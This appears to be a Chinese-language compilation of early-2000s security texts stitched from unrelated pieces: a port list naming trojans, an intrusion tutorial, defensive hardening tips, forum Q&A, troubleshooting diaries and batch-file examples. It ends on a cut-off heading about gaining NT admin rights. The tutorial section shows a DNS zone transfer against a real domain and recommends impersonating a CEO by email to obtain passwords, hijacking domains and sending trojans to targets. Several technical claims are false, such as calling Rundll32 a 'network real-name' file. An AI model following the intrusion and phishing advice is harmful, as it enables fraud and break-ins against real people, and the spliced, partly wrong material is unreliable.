PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。
17027 Conducent
这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:
机器会不断试图解析DNS名─ads.conducent.com,即IP地址216.33.210.40 ;216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(译者:不知NetAnts使用的Radiate是否也有这种现象)
27374 Sub-7木马(TCP)
参见Subseven部分。
30100 NetSphere木马(TCP)
通常这一端口的扫描是为了寻找中了NetSphere木马。
31337 Back Orifice “elite”
Hacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即3=E, 1=L, 7=T)。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,其它的木马程序越来越流行。
31789 Hack-a-tack
这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT, Remote Access Trojan)。这种木马包含内置的31790端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文件传输连接)
32770~32900 RPC服务
Sun Solaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将portmapper置于这一范围内,即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper,就是为了寻找可被攻击的已知的RPC服务。
33434~33600 traceroute
如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。参见traceroute部分。
41508 Inoculan
早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见
http://www.circlemud.org/~jelson/software/udpsend.html
http://www.ccd.bnl.gov/nss/tips/inoculan/index.html
(二) 下面的这些源端口意味着什么?
端口1~1024是保留端口,所以它们几乎不会是源端口。但有一些例外,例如来自NAT机器的连接。参见1.9。
常看见紧接着1024的端口,它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。
Server Client 服务 描述
1-5/tcp 动态 FTP 1-5端口意味着sscan脚本
20/tcp 动态 FTP FTP服务器传送文件的端口
53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。
123 动态 S/NTP 简单网络时间协议(S/NTP)服务器运行的端口。它们也会发送到这个端口的广播。
27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。
61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器(IP Masquerade)
黑客教材之2-入侵技术介绍
第一部分 收集信息与探测
收集信息
信息收集其实是非常重要的,当然,你只是一个工具爱好者就不说了。一个真正的入侵者应该非常具有针对性,而不是随便看看。这样就意味着需要收集和目标相关的足够的信息,而且需要判断哪些信息是可利用的。整个网络本身就是由信息构成的。
当然,对入侵有直接用处的是下面这些信息:
1、 相关人的姓名,常用代号,电子邮件地址
2、 网站地址,规模
3、 安全措施等级
4、 相关的开放主机信息
5、 与能接触到的主机的一切相关消息,比如最新BUG等等。(对付网管高手来说,就么跟他比谁的漏洞了解得最新最快)
在这么庞大的互联网上,怎么能够收集到需要的信息呢,这就需要熟悉使用搜索引擎了。我们常用的搜索引擎就是www.google.com 。它简直是无所不能,输入需要查询的内容就能够得到非常多的结果了。熟练使用搜索引擎就等于你可以准备做更多事情了。
当然,还应该去收集一些更加直接的东西,比如域名查询。这就是whois 。再UNIX系统中能够直接使用 whois来查询,WIN就不行,但是可以上网来查。
有这些地方:www.crsnic.net
www.networksolutions.com
www.arin.net
www.uwhois.com/cgi/whois.cgi
美国政府部门:whois.nic.gov/cgi-bin/whois
美国军事部门: whois.nic.mil
等等,只要是域名注册地方都能够使用Whois来查询。
比如:通过 whois.nic.gov查询 “whitehouse.” 后面有一个“.”哦。就能够得到非常多的域名信息,其中第一条就是:
Executive Office of the President (WHITEHOUSE-DOM)
Office of Administration
Washington, DC 20503
Domain Name: WHITEHOUSE.GOV
Status: ACTIVE
Domain Type: Federal
Technical Contact, Administrative Contact:
Reynolds, William D. (WDR)
(202) 395-6975
[email protected]
Domain servers in listed order:
DNSAUTH1.SYS.GTEI.NET 4.2.49.2
DNSAUTH2.SYS.GTEI.NET 4.2.49.3
DNSAUTH3.SYS.GTEI.NET 4.2.49.4
Record last updated on 28-Aug-00.
通过这些whois能够查询到域名相关的注册信息。其中对我们有帮助的是:
* 注册机构
* 相关ip地址
* 注册人联系办法,比如EMAIL、姓名等
* 有关DNS的解析地址
通过这样的查询,能够制造“域名劫持”的攻击,感兴趣的,可以到搜索引擎自己找找。
当我们确定域名后,就可以进行DNS查询,在*NIX和WIN系统都有一个nslookup的工具。这里,需要知道一些关于DNS的基本知识:
Start of Authority 授权开始 SOA 标记区数据的开始,定义影响整个区的参数
Name Server 名字服务器 NS 标明域的名字服务器
Address 地址 A 转换主机名到地址
Pointer 指针 PTR 转换地址到主机名
Mail Exchange 邮件交换 MX 标明发往给定域名的邮件应传送到的位置
Canonical Name 正规名 CNAME 定义主机名别名
HOST information 主机信息 HINFO 描绘主机硬件和操作系统的信息
Wellknown Service 著名服务 WKS 通告网络服务
现在进入nslookup的交互模式,在命令行输入nslookup。
C:/>nslookup
Default Server: ××××××××××××(我自己的,隐去了,呵呵)
Address: ××××××××××
> cnhonker.net (查询域名)
Server: ××××××××××
Address: ××××××××××
Non-authoritative answer:
Name: cnhonker.net
Addresses: 211.154.211.203, 211.154.211.204 (得到域名的相关地址)
> set type=ns (把查询的类别设置为查询名字服务器)
> cnhonker.net
Server: ××××××××××
Address: ××××××××××
Non-authoritative answer:
cnhonker.net nameserver = ns4.chinadns.com
cnhonker.net nameserver = ns3.chinadns.com
ns4.chinadns.com internet address = 202.108.32.89 (得到名字服务器地址)
ns3.chinadns.com internet address = 202.108.32.88
(这里一个是主名字服务器,一个是次名字服务器)
> server 202.108.32.89 (现在我们把DNS查询的服务器改为目标域名的名字服务器地址,就是替换我上面用××××××××××代替的部分)
Default Server: [202.108.32.89]
Address: 202.108.32.89
> set type=all (设置查询的内容是所有记录)
> ls -d cnhonker.net (显示域名的内容)
[202.108.32.89]
cnhonker.net. SOA ns4.chinadns.com hostmaster.ns4.chinadns.com. (2001
072841 3600 900 720000 3600)
cnhonker.net. NS ns4.chinadns.com
cnhonker.net. NS ns3.chinadns.com
cnhonker.net. MX 10 mail-g1.chinadns.com
cnhonker.net. A 211.154.211.203
cnhonker.net. A 211.154.211.204
admin A 202.108.32.88
news A 210.74.254.146
mysql CNAME mysql-g1.chinadns.com
mail CNAME mail-g1.chinadns.com
www A 211.154.211.203
www A 211.154.211.204
www2 A 61.153.17.3
bbs A 202.108.32.88
ftp CNAME www.cnhonker.net
cnhonker.net. SOA ns4.chinadns.com hostmaster.ns4.chinadns.com. (2001
072841 3600 900 720000 3600)
> exit
我们得到相当多关于这个域名的IP地址等等东西(NND,新网查得这些详细)。Nslookup是一个非常有用的命令,如果需要知道怎么使用,请用?查询。
信息收集还有一些非常多的办法,最可能多获得的地方就是对方的网站了。请留意网页中得下面这些地方:
1、网页上的相关email地址,也许能得到某某人的姓名使用的EMAIL。
2、各个子域名,一般对不同子域名可以得到不同的IP地址或者说是不同的服务器,请相信,数量和漏洞是成正比的。
3、多看看网页得源代码,也许很多注释里面有不少内容呢。
到这里,已经提到很多次收集EMAIL地址了。EMAIL有这些用途:
1、可以伪装一个EMAIL帐号,然后给另外的EMAIL发信,要求密码帐号什么或者探听有关消息之类,如果你冒充的是CEO,可能密码就轻松搞定。
2、伪装域名管理EMAIL可以试探进行域名劫持。
3、一般EMAIL帐号的密码破解比系统密码破解容易得多,通常邮件密码是一直没有改过的而且非常简单。如果能够得到一个EMAIL帐号,你可以接收其邮件,得到更多的信息。
4、给某个EMAIL发邮件,从别人的回信的邮件头中可以得出其使用的邮件服务器地址,甚至可能得到其内部网的IP地址,还能够知道他使用的什么邮件软件,如果是OE,那么就可以使用OE的漏洞。
5、给他发木马,粗心的人对很多感兴趣的话题失去警惕,可能就中了你的木马。
架起网络安全防线
内容:
许多人都抱怨Windows漏洞太多,有的人甚至为这一个又一个的漏洞烦恼。为此,本文简要的向您介绍怎样才能架起网络安全防线。
网络安全第一线:禁用没用的服务
Windows提供了许许多多的服务,其实有许多我们是根本也用不上的。或许你还不知道,有些服务正为居心叵测的人开启后门。
Telnet就是一个非常典型的例子!让我们先看看在Windows2000的服务中是怎么解释的:“允许远程用户登录到系统并且使用命令行运行控制台程序。”你说,这样的服务,你需要吗?我个人建议禁止该服务。
还有一个值得一提的就是NetBIOS。对于他的功能,本文就不做过多地介绍了。从前,我从没有注意到该服务,直到我在学习网络监听和隐藏时才发现该项服务存在极大的安全隐患!因此,我个人建议禁止该服务。
Windows还有许多服务,在此不做过多地介绍。大家可以根据自己实际情况禁止某些服务(Windows 9x的用户,可以用新版的优化大师禁用服务)。禁用不必要的服务,除了可以减少安全隐患,还可以增加Windows运行速度,何乐而不为呢?
网络安全第二线:打补丁
Microsofe公司时不时就会在网上免费提供一些补丁,有时间可以去打打补丁。除了可以增强兼容性外,更重要的是堵上已发现的安全漏洞。
本人不赞成将所有补丁都打上。因为,这样无形中就增加了Windows的负担。特别是用户根本不用的服务的相关补丁,根本没有打的必要!因此,我建议有能力的朋友可以根据自己的实际情况根据情况打适合自己补丁。
网络安全第三线:反病毒监控
我有深刻的体会:我的反病毒监控一个月至少能在我上网时截获3个或更多的病毒。可见,网上病毒实在太多了。一不小心,就会被感染。
我认为最好还是选择国产反病毒软件。有的人喜欢追求国际权威,当然我不是否认国际权威反病毒软件的防毒能力。但是,不知道大家有没有听过“远水不能救近火”这句话呢?当然,国际权威对付国际上流行的病毒是绝对没问题的,但是对付本国土生土长的病毒呢?恐怕就不一定行了。况且,国际权威往往还会存在这样的两个问题:第一,全世界的黑客都以攻破国际权威反病毒软件的防线为荣;第二,国际权威防病毒软件会不会为未来战争留下后门呢?
反病毒软件不是拿来听的,也不是拿来看的!用反病毒软件的根本目的是防病毒!所以,上述所讲的内容请大家三思。
另外,安装反病毒软件后必须对其进行必要的设置和时刻开启反病毒监控。这样才能发挥其最大的威力。
网络安全第四线:网络防火墙
对于怎样选择网络防火墙方面,我个人认为除了上面讲的选择国产品牌外,我还补充一点:选择功能强大而不起眼的产品。
为什么要这样呢?主要原因还是为了安全。正所谓树大好招风,那些被所有人都认可产品固然功能强大,但是却树敌太多。每一位听说过它的黑客都想攻破它。你说,这样的安全性还能高吗?
因此,我建议选择功能强大而不起眼的产品。
或许,你会问,为什么我在介绍选择反病毒软件时没提到选择功能强大而不起眼的产品呢?
其实,原因很简单,制作好的反病毒软件技术要比制作好的网络防火墙要难得多!大家可以想想,现在让人放心的反病毒软件所有品牌都是经过千锤百炼出来的。国际上有Norton、PC-cillin等,国内有瑞星、杀毒王,他们这品牌创立的多久?经历了多少风风雨雨?反病毒技术不是说一朝一夕就能成熟的,因此我在介绍选择反病毒软件时没提到选择功能强大而不起眼的产品。
网络安全第五线:数据备份
数据备份我就不想多说了,不过我建议用Ghost进行备份。有条件的朋友可以将备份刻录到光盘中。这样就可以在必要时毫不费力的恢复自己的数据。
计算机实战分析
[网络安全类]
问:如何配置防火墙规则可以更安全?
答:根据个人需要而定。有的人追求的是绝对的安全,那么就必须自己设置许多规则,像新发现的漏洞、木马、病毒等都可以进行设置。但是这需要有一定专业知识,特别是网络协议知识!但是,对于一般用户来说,就没有必要设置太多的规则。防火墙主要能防常见电子炸弹、常见木马、ping等即可。
问:看了你的文章中谈到隐藏ip,请问是怎么回事?
答:有许多网友也曾问过我这个问题。
就整体而言,隐藏ip在技术上是可行的,但是在实际上对于一个用户来说是不可行的。为什么呢?这就像写信一样,如果不写发信人地址,那收信任怎么回信呢?网络是一个整体,要想在网络中漫游,必须留下“回信地址”,服务器才有可能将信息送到用户的计算机中。如果隐藏了ip,可以说就是一种常见的DOS攻击!但对于黑客来说,隐藏ip是绝对必要的,这里就不做过多的讨论了。
但是,就局部而言,隐藏ip是可行。比如,通过代理服务器,便可以间接隐藏自己的ip。又如,在QQ中通过隐身可以隐藏自己的ip(隐身通过QQ服务器转发)。
问:你在《密码防盗——常见问题分析》一文中提到“DNS”欺骗,请问这是什么意思呢?
答:所谓DNS就是域名服务器,只要是扮演将Internet的ip地址映射具有一定涵义的字符的角色。实际上一个网站是有他自己的ip地址的,但是ip地址不好记忆,所以用DNS。DNS欺骗就是将一个DNS所对应的合法ip转向另一个非法ip,让用户以为该网被黑、输入网址错误。在该文中说的“DNS欺骗”其实是带有Web欺骗性质的。所谓Web欺骗,就是网页内容与某网完全一样,让人误解为进入了那个网站。
问:防火墙报警说有人意图连接我的80端口。这是怎么回事啊?是不是我中木马了?
答:中木马可能性不大。因为木马使用的端口是高端。80是HTTP端口。不过,有一种可能就是别人扫描你的端口。
问:我的机器被人种了DameWare迷你远程控制,我该怎么办呀?怎样清除改木马?如何不让改软件再次出现? 我先谢谢各位大哥了!
答:在安全模式下全盘杀毒看看能不能清除。如果不行,考虑的可能就是手动了。
问:请问黑客进行入侵活动的基本步骤是什么?
答:黑客一般不会随便入侵、攻击别人,他们有着自己的章程,可以说真正的黑客是可敬的。黑客进行入侵活动的大致步骤分为三步:第一步,寻找目标或试探目标是否在线;第二步,进行入侵活动;第三步,清理痕迹。
[操作类]
问:怎样查QQ好友的ip?
答:这是一个比较热门的问题。可以通过下载工具,设置是别人改装过的QQ来实现。但是,这样不免会出现诸多安全隐患。所以,我想您介绍一种方法:通过网络防火墙。设置如下:
名称:(随便)
类型:应用程序
操作:允许
方向:双向
数据链:全部
协议:TCP或UDP
源端口:4000-4001
记入日志
问:我用的系统是win2000,我错手删除了“显示桌面”怎么办啊!!
答:打开记事本写入:
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
将记事本以“桌面.scf”名字保存
问:新系统一般需要安装什么软件?
答:我个人认为文字处理、反病毒软件、下载工具、压缩软禁是必备的。剩下的就看个人需要了。
问:注册表被锁定怎么办?
答:建立一个REG文件。代码如下:
REGEDIT4
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System]
"DisableRegistryTools"=dword:00000000
[其它]
问:请问win386.swp是什么文件,为什么删除不了?是不是病毒?
答:不是。这是Win 9x和Win ME的虚拟内存文件。即使强行删除,也会再次出现。
问:请问Rundll32是个什么文件?有什么用?
答:它是网络实名的文件。
问:请问专用杀毒工具和专业反病毒软件有什么不同?
答:且不说别的,专用杀毒工具一般是免费的,专业反病毒软件绝对是要买才能使用的。在内核技术上,专用杀毒工具一般用的是代码特征法,一般不会误报,杀毒能力强。但是致命弱点就是它的局限性——只能查已知病毒。专业反病毒一般用的是行为行为特征法,能查未知病毒,杀毒能力较强。但是,弱点在于容易出现误报。一般的,我主张使用专业反病毒软件防毒,但是在确定感染某一病毒时,最好还是用专用杀毒工具查杀。
问:请问反病毒监控和网络防火墙有什么区别?
答:反病毒监控主要针对本地病毒、木马,网络防火墙主要针对黑客、攻击等。
问:TCP和UDP有什么区别?
答:打个比方,现在有一台电视机,要将它抬进屋子里。有两种方案:一、拆成几分,进屋后再组装,这就类似于TCP 二、直接搬进去,这就类似于UDP。
问:请问内存与硬盘有什么区别?
答:简单来讲,内存是暂时存放数据的地方,而硬盘是长期储存数据的场所。
本文问题主要在瑞星论坛收集,也有一部分是网友的提问。
鉴于时间和水平问题,不免会出现诸多错误,请各位指教。
2003-1-23
密码防盗——常见问题分析
密码防盗问题恐怕已经讨论了几千年了——从密码一出现,密码的防盗问题就被提上了相关部门的议事日程。然而,在网络时代的今天,密码防盗问题依然是大家谈论的焦点。下面,我以自己的经验和体会,向大家简单的对一些常见问题进行分析与讨论:
问题1:我上了一个网站,看上去和XX银行的页面完全一样。我信以为真,于是输入账号和密码想查看自己存折内的剩余资金。谁知,过了几天后我才发现自己的存折被别人提了款……
分析:这属于WEB欺骗。在你上该网站之前,你有没有确定这个网站的实质呢?仅仅因为页面看上去和XX银行一样,就断然输入自己的账号和密码是相当不明智的。
防范方法:
1 银行都会在一些明显的地方写上银行的网址,通过这样进入银行首页,然后享受网上银行服务较为安全。
2 为了慎防DNS欺骗,所以在进入银行网站后,可以进行有效性测试。例如,在输入账号和密码的时候故意输入错误(如果是真的银行,会提示输入错误;如果不是真的银行则不会提示)等。
3 为了慎防本地木马对账号和密码的拦截,必须采取键盘欺骗。如,输入账号和密码时,有意将输入顺序打乱(现在的木马只做键盘纪录),使用反病毒软件等。
4 为了慎防网络探嗅器对账号和密码的拦截,请在输入账号和密码前做一次本地端口扫描。但是,这方法用处可能不大。主要还是选用加密技术较安全的网络银行。
问题2:今日,我受到了一封邮件,是腾讯公司的。内容是说QQ密码保护要进行该版,所以要新输入密码。因此,请将密码发往[email protected]邮箱。谁知,过了不久,我发现已经无法登陆我的QQ了……
分析:其实,对于某些行家来说,只是一个笑料。但是这利用了某些人保护密码心切的心理,巧妙的设计了这样一个骗局。即使想来源也是相当困难的,因为那邮箱这很可能只是一个中转站,也就是说可以通过自动转信功能,将信件转往别的邮箱……怎么查?死无对证!
防范方法:
1 查看邮件发送地址,如果不是腾讯的,那就肯定是骗人的。
2 为了防止邮箱地址欺骗,有能力的用户还必须查看邮件的发送ip。如果,该ip是深圳的,就有可能是真的;如果不是深圳,就肯定是假的。
3 上腾讯主页查看是否存在相关消息。
问题3:在网络上经常有人互相传某些网址,有的当然是善意的,像贺卡等,但有的却是病毒、木马或恶意网页代码!让人防不胜防。请问,我该如何确定其中的真伪呢?
分析:当然,不可否认,亲戚、同学、朋友、知心网友之间互传祝福等内容的网址是相当不错的。但是,也不否认的确有这样一些无聊人士总在其中搞小动作。这个问题相当严重,也经常困扰着某些网络的新手。
防范方法:
1 最简单的方法是安装和正确使用反病毒软件。
2 有能力的网友,还可以通过工具(如网络快车)迅速探索该网目录,一般都能辨别真伪!也可以将首页(index.html)下载下来分析分析。
3 对不熟悉的人发来的地址一律删除!
问题4:网络防火墙报警!说人或程序有意图连接木马端口!怎么办?我的密码是否会丢失啊?
分析:出现这样的现象原因大致有这几个:1 本地计算机中了木马;2 远程计算机意图对本地计算机强行安装木马;3 远程计算机意图控制本地计算机;4 网络防火墙误报。
防范方法:
1 在网上绝对不要公开自己的ip,特别是固定ip的用户。如果需要让别人分析某些报告,请事先将自己的ip隐藏。例如,假如ip为176.36.46.56,可以写为176.36.4*.**。
2 使用反病毒防火墙,并经常升级病毒库。
3 不定时进行反病毒扫描。
4 在确定中木马而又无法清除的情况下,向反病毒公司或高手求救。
5 查看对方ip,在确认确有人搞小动作的情况下,向公安机关报案。
如果,大家有什么问题不妨发邮件给我,我一定尽力为大家解决。祝大家的计算机永远健康。
2003-1-3
计算机实战分析1 ——关于网络冲突问题
今天开机,win2000忽然弹出一个对话框,内容如下:“系统检测到 IP 地址***.***.***.***(我的ip)和网络硬件地址 00:D0:09:FD:F0:88 发生地址冲突。本地界面已禁用。网络可能随时中断。”
这可是第一次出现啊!当时,我真的不知该如何处理!过了大约1分钟,我平静了心情,开始了排除故障的努力!
排除故障第一步:重新启动。
因为,这可能是偶尔的错误。于是,重启。
在进入windows桌面后,没出现该对话框。哈,看来真的是偶尔的错误。尽管如此,但是我还是进行测试。
启动IE。速度上显然很慢!!慢慢慢!宽带的速度居然能和拨号的媲美!
但是,过了没多久,同样的对话框再次出现了!
重复重启操作,问题依旧如此。这可以断定问题不是偶然出现的。
排除故障第二步:查毒。
因为,病毒可能造成系统出现种种问题。于是,我用瑞星(最新版)全盘查毒。
开启所有监控项目,先查内存,再查硬盘。结果——未发现病毒。
接着,我开启注册表,找到启动键值。未发现未知程序。
这可以断定问题不是出在中病毒上。
排除故障第三步:解决有可能造成的冲突问题。
因为,昨日情况相当正常,所以可以考虑是否因软件冲突而引起的。
昨日,我进行的软件安装或升级操作有:1、升级瑞星杀毒软件 2、安装C语言学习系统 3、安装WinRAR 3.10 beta4。
所以,我断定如果是因软件冲突引起的,就一定在这三个软件上。
1 对瑞星杀毒软件的测试
设置开机不启动实时监控。然后重新启动计算机。
进入桌面后,启动IE开始上网,起初速度还可以,然后便出现了同样的问题。
这可以初步断定问题与瑞星杀毒软件无关。
2 对C语言学习系统的测试
我卸载了该软件,然后重启。问题依旧……
3 对WinRAR 3.10 beta4的测试
我也是先卸载了该软件,但是问题没有得到解决。于是,我重新安装该软件。
因此,可以肯定的说,问题不是出在软件冲突上。
排除故障第四步:端口扫描
因为,从端口扫描可以知道许多的问题:例如,计算机是否与网关连接,是否有人在搞小动作等。
我在windows下,开启优化大师的附带的工具,进行扫描。得出下面结论:在未出现对话框前,计算机与网关正常连接;在出现对话框后不久,计算机与网络根本就是断开的。
接着,我用“命令提示符”(与DOS差不多)测试。键入下面命令:“netstat -n”,结论与刚才的结论一样。
这可以断定,计算机的网络连接在未出现对话框前正常,在出现对话框后不久就被完全切断。这也可以初步排除是本地网络硬件的问题。
排除故障第五步:硬件问题
因为硬件的问题可能导致系统的错误,如接触不良等。
1 网线问题
我将网线拔出来,扫除接口的灰尘,将其再次插入。问题没有解决。
2 其它硬件问题
我对硬件不太熟悉,所以不敢自己动手。准备如果自己不能解决就找专家来当场验证。
排除故障第六步:windows问题
因为,windows文件的损坏可能造成许许多多意想不到的故障。
首先,考虑的是修复windows。
重启计算机,将BIOS设置为光驱优先,然后放入系统盘。
修复以后,问题依旧存在。
这可以初步断定,问题可能不在文件损坏上。
其次,可能就要重装windows了。
在这操作之前,必须考虑清楚,因为这个操作会浪费许多时间,但是问题步一定能解决。我考虑的问题如下:
1 网络连接既然如此怪:时断时连,这证明了什么呢?证明问题可能出在本地计算机或者网关那里。
2 统文件已经初步排除了损坏的可能,即使重装windows也不一定能解决问题
排除故障第七步:分析结果
因为做了常规测试后,为找出问题的所在,就必须进行分析,以便找出疏漏和找出更好解决方案。
分析如下:
1 问题不排除出在病毒上,因为可能是中了某些未知的病毒。但是,计算机并没有发现明显的中毒迹象:内存使用、CPU使用一切正常,硬盘未发现怪异文件。
2 问题不排除出在软件冲突上,因为软件冲突造成的问题可能会具有滞后性。
3 端口扫描结果显示,问题不一定是出在刚启动windows的时候,也就是说即使是说可以初步排除是因病毒造成的了。
4 在硬件上,因水平问题,没做全套测试。问题很可能出在硬件上。
5 修复windows后,问题依旧说明问题很可能不是出在文件损坏上。
6 不排除问题出在网关上,也就是说与本地计算机没有一点关系。
排除故障第八步:寻求高手
因为,高手们往往很有经验,所以对问题的分析和处理肯定会比我们这些普通人全面和有效。
1 上网求救
由于网络完全被断开,我根本不可能在网上进行求救。
2 寻求高手当场解决问题
由于一时想不起在我认识的人中能帮助我的人,所以……
排除故障第九步:沉默
因为,在沉默的这段时间里可以让操作者静下心来分析问题和思考解决方案,也可以通过各种方式高手讨教。
最后,问题在11点半消失了。
全盘分析结果:
在常规测试后,不能找出问题的所在,而问题却在不久后“无故”的消失了,这可以初步断定问题可能真的出在网关上。
经验:
在电脑上遇到问题,经过常规测试后依然无法找到问题的根源和得出解决方案时,沉默是最好的处理方式。
在电脑上遇到问题时,询问高手或者让高手当场进行测试固然很好,但是如果找不到高手怎么办?所以,最好还是使自己成为高手,这样可以免去许多麻烦。
2002-12-08
计算机实战 2——关于Windows启动问题
在实战1中,谈到在排除网络冲突问题的测试中,本人曾经用系统盘修复win2000——在网络冲突问题消失后,又出现了另外一个问题:启动时(未进入windows)出现了这样一个DOS选择菜单“1 Microsoft Windows 2000 Professional 和 2 Microsoft Windows 2000 Professional 安装程序”。本来这没什么,但是最讨厌的是它的默认选项是 2,也就是说如果我不在相应时间内做出选择的话就自动进入win2000安装程序!
这该怎么办呢?这可是我以前曾经想解决而没解决的问题啊!没办法,我总不能逃避它啊!
行动一:查找文件
我相信这个菜单不是平白无故出来的,它的存在一定是有一个文件支持。
我进入windows,从文件夹设置中选择“显示所有文件”和去除“隐藏系统文件”。
我进入C盘,发现多了许多文件。我知道文件一定在这些隐藏的文件里,而且一定没有修改限制。因为优化大师可以设置该菜单的等待时间。
终于,在排除许多文件后,我找到了“boot.ini”! 没错,就是它!
行动二:复制文件
我知道这个文件的重要性,所以我将它复制到一个目录下进行处理。
行动三:分析文件
我用记事本打开该文件的副本,其代码如下:
[Boot Loader]
Timeout=5
Default=C:/$WIN_NT$.~BT/BOOTSECT.DAT
[Operating Systems]
multi(0)disk(0)rdisk(0)partition(1)/WINNT="Microsoft Windows 2000 Professional" /fastdetect
C:/$WIN_NT$.~BT/BOOTSECT.DAT="Microsoft Windows 2000 Professional 安装程序"
我当时开始分析代码,初步结果如下:
在第二行的“Timeout=5”是指在5秒后如无选择,自动启动默认选项。
在第三行的“Default=C:/$WIN_NT$.~BT/BOOTSECT.DAT”应该是指默认启动文件。
下面的“multi(0)disk(0)rdisk(0)partition(1)/WINNT="Microsoft Windows 2000 Professional" /fastdetect”和“
C:/$WIN_NT$.~BT/BOOTSECT.DAT="Microsoft Windows 2000 Professional 安装程序"”正是启动时选项和路径。
行动四:修改文件
对文件的初步分析结果是修改该文件的理论根据。
因此,我将文件进行了修改,代码如下:
[Boot Loader]
Timeout=5
Default=C:/
[Operating Systems]
multi(0)disk(0)rdisk(0)partition(1)/WINNT="Microsoft Windows 2000 Professional" /fastdetect
为了避免由于错误产生的无法开机现象,我将源文件复制到和副本一样的目录,取名“boot1.ini”。我编写了一个批处理(1.bat),放在C盘下,方便在DOS恢复。其代码如下(副本和源文件放在C:/a下):
Copy c:/boot.ini c:/a/a
Del c:/boot.ini
Copy c:/a/boot1.ini c:/
c:
Ren boot1.ini boot.ini
dir.ini/a
于是,我将原文件剪切到c:/a下,将修改后的文件复制到C盘下。
行动五:测试结果
我准备好了DOS启动A盘(不能开机时进入DOS恢复文件),然后重新启动。
结果不令人满意:原来的“Microsoft Windows 2000 Professional 安装程序”变成了“Microsoft Windows 2000(默认)”,默认选项依旧是它!
行动六:分析失败原因
我进入了win2000,查看文件代码,在寻找失败的原因。
最后,我发现了代码中的“Default=C:/”可能是失败的主要原因!因为在未被修改时,这里是“Default=C:/$WIN_NT$.~BT/BOOTSECT.DAT”刚好与下面的“C:/$WIN_NT$.~BT/BOOTSECT.DAT="Microsoft Windows 2000 Professional 安装程序"”相对应。
因此,我将代码中的“Default=C:/”改为“Default=multi(0)disk(0)rdisk(0)partition(1)/WINNT”。
行动七:再次测试
结果让人满意,计算机直接进入了Win2000(连DOS选择菜单也没有了)!
全盘分析结果:
在第一次处理这次出现的问题时,出现了意想不到的事情,是因为我没注意到文件代码的特点而造成的。总的来说,在处理这个问题的过程中,我的能考虑到许多方面,虽然有些反复,但是还是值得以后继续发扬的。
经验:
在处理文件问题时,我们通常要考虑到这些问题:
1 文件的特性
2 文件代码的特点
3 出错的补救措施
只有有了把握,才能动手,而且必须做好失败后恢复的打算,否则后果不堪设想。
2002-12-08
计算机实战 3——关于批处理的运用
批处理,说白了就是DOS操作。有人认为DOS操作过时了、落后了,其实不然。其中,最大的好处就在于快、不留痕。然而,在许多时候,Windows操作根本是解决不了问题的。
必备常识:批处理的编写和修改
打开记事本,将要编写的内容写在里面。在存为bat文件即可。修改也可以用记事本打开进行修改。
批处理运用一:扫描本地端口
这个功能优化大师有,就是扫描哪个端口与internet连接和连接ip。这,为及时发现并拦截非法连接有着不可取代的功劳。
然而,启动优化大师太慢了,而且太烦了,不利于随机使用。因此,编写一个这样的批处理来解决问题就显得尤为重要了。
************************************************************
代码:
netstat -n
pause
附:也可在每一行开头添上“@”,这样命令就不会显示出来。
************************************************************
批处理运用二:查常见病毒
其实,对于上网的人来说,遇到病毒是在所难免的。然而,如果真的不幸感染,怎样才能发现呢?难道真的要买昂贵的杀毒软件吗?不一定。
我们可以编写批处理来查一些常见的网络病毒。如果确认感染病毒,可以下载专用杀毒工具进行查杀,或采取其他途径杀毒。
下面,我以欢乐时光为例进行分析:
主文件:1.bat
其它文件:2.bat 3.bat
************************************************************
1.bat代码:
@if exist c:/folder.htt call 2.bat
@if exist d:/folder.htt call 2.bat
@if exist e:/folder.htt call 2.bat
@if exist f:/folder.htt call 2.bat
************************************************************
2.bat代码:
@echo 发现欢乐时光病毒!
@call 3.bat
@pause
************************************************************
3.bat代码:
@dir c:/*.htt /s/a>1.txt
@dir d:/*.htt /s/a>2.txt
@dir e:/*.htt /s/a>3.txt
@1.txt
@2.txt
@3.txt
************************************************************
这样,如果中毒,那么必定会存在大量folder.htt和Desktop.ini,通过这样可以粗略的检查计算机是否感染病毒。
批处理运用三:文件处理
假设,我要大规模的做文件的移动、删除等,如果在Windows里操作不免会出现错误,而且这些错误不易察觉。因此,用批处理进行操作,不但简单易行,而且容易发现错误并可以及时纠正。
例如,我要将D盘的htm文件移动到E盘,再格式化D盘,然后将文件移回D盘,并改后缀为html。
************************************************************
1.bat代码:
@E:
@Md d
@D:
@Copy *.htm e:/d
@if exist e:/d/*.htm call 2.bat
************************************************************
2.bat代码:
@C:
@format d:/q
@Copy e:/d/*.htm d:
@D:
@Ren *.htm *.html
************************************************************
从例子中,可以看出,如果一旦出现问题,是很容易被发现的。从而,也证明了批处理的可用性。
关于批处理的运用,可以说博大精深,变化莫测。希望大家能够用DOS命令去优化它,这样才能让其更好的为我们服务。
获取NT的admin权限的方法
涉及程序:
NT server
描述:
一般用户获取NT服务器Admin权限的方法
详细:
获取NT的admin权限的方法:
